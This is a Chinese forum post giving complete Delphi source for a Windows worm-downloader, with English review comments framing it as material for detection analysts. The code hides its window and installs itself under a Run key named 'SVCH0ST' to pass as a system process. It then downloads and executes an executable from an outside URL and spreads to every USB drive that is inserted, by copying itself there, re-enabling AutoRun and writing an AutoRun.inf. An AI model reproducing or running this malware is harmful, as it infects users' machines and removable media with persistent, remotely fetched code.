作者: Winmillion [winmillion] 论坛用户 | 登录 |
// NOTE(review): listing reproduced as it appears on the page (including its string
// literals); the comments below describe the observable behaviour so that analysts
// can derive detection and response points from it.
interface

uses
  Windows, Messages, SysUtils,Forms,IniFiles;

type
  // Hidden main form: FormCreate sets Application.ShowMainForm := False, so the
  // window only exists to receive WM_DEVICECHANGE notifications.
  TFrm_Main = class(TForm)
    procedure FormCreate(Sender: TObject);
    procedure FormClose(Sender: TObject; var Action: TCloseAction);
  private
    // Handler for WM_DEVICECHANGE; reacts to DBT_DEVICEARRIVAL of a logical volume.
    procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
  public
    { Public declarations }
  end;

const
  // Name of the dropped/copied executable (file IoC): spoofs svchost.exe with a zero.
  exefile = 'SVCH0ST.EXE';
  // Download source used by Startup (network IoC, as posted).
  Buffer = 'http://www.888.com/hello.exe';
  DBT_DEVICEARRIVAL = $8000; // system detected a new device
  DBT_DEVICEREMOVECOMPLETE = $8004; // device is gone
  DBT_DEVTYP_VOLUME = $00000002; // logical volume
  DBTF_MEDIA = $0001; // media comings and goings

type
  // Common header of every WM_DEVICECHANGE broadcast structure.
  PDEV_BROADCAST_HDR = ^TDEV_BROADCAST_HDR;
  TDEV_BROADCAST_HDR = packed record
    dbch_size : DWORD;
    dbch_devicetype : DWORD;
    dbch_reserved : DWORD;
  end;
  // Volume broadcast; dbcv_unitmask carries one bit per drive letter (bit 0 = A:),
  // which WMDeviceChange scans to find the newly arrived volume.
  PDEV_BROADCAST_VOLUME = ^TDEV_BROADCAST_VOLUME;
  TDEV_BROADCAST_VOLUME = packed record
    dbcv_size : DWORD;
    dbcv_devicetype : DWORD;
    dbcv_reserved : DWORD;
    dbcv_unitmask : DWORD;
    dbcv_flags : WORD;
  end;

// Direct imports of URLDownloadToFileA (urlmon) and WinExec (kernel32): the
// download-and-execute pair, a useful import-table signal for detection.
function UrlDownLoadToFile(Caller,URL,FileName: PAnsiChar;Reserved: LongWord; StatusCB: Pointer): LongWord; stdcall; external 'URLMON.DLL' name 'URLDownloadToFileA';
function WinExec(lpCmdline: PAnsiChar; uCmdShow: LongWord): LongWord; stdcall; external 'kernel32.dll' name 'WinExec';

var
  Frm_Main: TFrm_Main;
  // Full path of the executable inside the system directory; set in FormCreate.
  exefull:string;

implementation

{$R *.dfm}

// Creates (or opens) subkey under key and stores value as a REG_EXPAND_SZ value
// named name. Returns True only when RegSetValueEx reports 0 (success); the handle
// is closed on every path.
function SetRegValue(key:Hkey; subkey,name,value:string):boolean;
var
  regkey:hkey;
begin
  result := false;
  RegCreateKey(key,PChar(subkey),regkey);
  if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
    result := true;
  RegCloseKey(regkey);
end;

// Persistence and payload stage. Observable sequence:
//   1. writes a HKLM Run-key value named 'SVCH0ST' pointing at TheName (registry IoC);
//   2. downloads Buffer to TheName (the return value is not checked);
//   3. sets hidden+system attributes on the downloaded file;
//   4. shows a message box, then launches the file via WinExec.
procedure Startup(var TheName:string);
begin
  SetRegValue(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun','SVCH0ST',TheName);
  UrlDownloadToFile(nil, PChar(Buffer), PChar(TheName), 0, nil);
  SetFileAttributes(PChar(TheName),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
  messagebox(0,'文件下载成功!','成功',MB_OK);
  WinExec(PChar(TheName), SW_SHOWDEFAULT);
  //Sleep(500);
  //DeleteMe;
  //freemem(@path,256);
end;

// Removable-media propagation. On DBT_DEVICEARRIVAL of a logical volume it:
//   - derives the drive letter from the lowest set bit of dbcv_unitmask;
//   - copies exefull onto that volume as exefile and marks it read-only+hidden ($03);
//   - sets HKCU ...PoliciesExplorer\NoDriveTypeAutoRun to 0 (re-enables AutoRun for
//     all drive types; a value worth monitoring);
//   - replaces any existing AutoRun.inf on the volume with one whose [AutoRun]
//     'open' entry is exefile, then hides it.
// The TIniFile instance created here is never freed.
procedure TFrm_Main.WMDeviceChange(var Msg: TMessage);
var
  lpdb : PDEV_BROADCAST_HDR;
  lpdbv : PDEV_BROADCAST_VOLUME;
  unitmask:DWORD;
  i:integer;
  MyIni:TIniFile;
  s:Hkey;
  value:dword ;
  inifile:string;
begin
  lpdb := PDEV_BROADCAST_HDR(Msg.LParam);
  case Msg.WParam of
    DBT_DEVICEARRIVAL : // a device has finished arriving
      if lpdb.dbch_devicetype=DBT_DEVTYP_VOLUME then
      begin
        lpdbv := PDEV_BROADCAST_VOLUME(lpdb);
        unitmask:=lpdbv.dbcv_unitmask; // bitmask of affected drive letters
        for i:=0 to 25 do // scan drive letters A..Z
        begin
          if Boolean(unitmask and $1)then // first drive whose state changed
            break;
          unitmask := unitmask shr 1;
        end;
        if fileexists(exefull) then // copy the executable onto the new volume
        begin
          copyfile(PChar(exefull),Pchar(char(i+65) + ':' + exefile),false);
          FileSetAttr(char(i+65) + ':' + exefile,$00000003); // read-only + hidden
        end;
        inifile:=char(i+65)+':AutoRun.inf'; // AutoRun.inf on the new volume
        // NoDriveTypeAutoRun := 0 under the user's Explorer policies key
        RegOpenKeyEx(HKEY_CURRENT_USER, 'SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer', 0, KEY_ALL_ACCESS, s);
        value:=0;
        RegSetValueEx(s,'NoDriveTypeAutoRun',0, REG_DWORD,@value, sizeof(value));
        RegCloseKey(s);
        // drop any pre-existing AutoRun.inf (clear attributes first so DeleteFile works)
        if fileexists(inifile) then
        begin
          FileSetAttr(inifile,$00000000);
          DeleteFile(inifile);
        end;
        // [AutoRun] open=SVCH0ST.EXE
        MyIni := TIniFile.Create(inifile);
        MyIni.WriteString('AutoRun', 'open',exefile);
        FileSetAttr(inifile,$00000003); // read-only + hidden
      end;
  end;
end;

// Startup check. Hides the main form, builds exefull from the system directory,
// reads the HKLM Run value 'SVCH0ST', and if the hard-coded file path exists and
// the Run value equals exefull (case-insensitive) reports success; otherwise runs
// Startup (download + persist + execute). Return codes of the registry calls are
// not checked, so value may be uninitialised when the key or value is absent.
procedure TFrm_Main.FormCreate(Sender: TObject);
var
  s:hkey;
  value:array[0..255]of char;
  size:cardinal;
  path:array[0..255] of char;
begin
  Application.ShowMainForm:=False; // never show a window
  getsystemdirectory(path,120);
  exefull := strpas(path) + '' + exefile;
  size:=256;
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun',0,KEY_ALL_ACCESS,s);
  RegQueryValueEx(s,'SVCH0ST',nil,nil,@value,@size);
  RegCloseKey(s);
  // file present and autostart already registered
  if fileexists('C:WINDOWSsystem32SVCH0ST.EXE') and (UpperCase(value) = UpperCase(exefull)) then
    messagebox(0,'自启动成功!','成功',MB_OK)
  else
    Startup(exefull); // download-and-execute routine
end;

// Terminates the whole application when the hidden form closes.
procedure TFrm_Main.FormClose(Sender: TObject; var Action: TCloseAction);
begin
  Application.Terminate;
end;

end.
地主 发表时间: 09-03-09 21:31 |